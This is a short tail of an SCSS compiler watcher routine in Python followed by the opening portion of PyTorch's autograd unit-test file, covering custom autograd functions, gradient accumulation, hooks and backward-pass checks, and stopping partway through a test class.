dependencies = []
if ( os.path.isfile(config_file)):
dependencies.append(config_file)
if self.run_watcher:
watch_files = []
for filename in self.find_files(root_scss):
dependencies += self.find_dependencies(filename)
watch_files.append([filename, dependencies])
self.watcher = threading.Thread(target=self.thread, args=(output, watch_files))
self.watcher.start()
else:
for filename in self.find_files(root_scss):
# get dependencies by searching imports in target files
dependencies += self.find_dependencies(filename)
self.compile_file(filename, output, dependencies)
|
test_autograd.py
|
# Owner(s): ["module: autograd"]
import contextlib
import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
import operator
from copy import deepcopy
from collections import OrderedDict
from itertools import product
from operator import mul
from functools import reduce
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing import make_tensor
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (
TestCase, run_tests, skipIfNoLapack, slowTest, IS_WINDOWS, IS_MACOS,
disable_gc, gradcheck, gradgradcheck, parametrize, instantiate_parametrized_tests)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import mask_not_all_zeros
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipMeta)
from torch.testing._internal.common_dtype import get_all_dtypes
from torch.testing._internal.logging_tensor import no_dispatch
import pickle
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.atan2, choose a different op
torch.atan2(dual_x, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
def test_accumulate_grad_with_zero_numel_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_grad_batched_grad(self):
x = torch.randn(2, 2, requires_grad=True)
out = x.clone() # Size([2, 2])
batched_grad = torch.arange(3).expand(2, 2, 3).transpose(0, 2) # Size([3, 2, 2])
grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))
# Detect shape mismatch
grad_out = torch.ones(2, 2)
with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
# Scalar outputs
out = x.sum() # Size([])
batched_grad = torch.arange(3) # Size([3])
grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))
# We consider scalar and sized-1 to be a mismatch. This is consistent with current non-batched behavior.
grad_out = torch.ones(2).unsqueeze(1)
with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
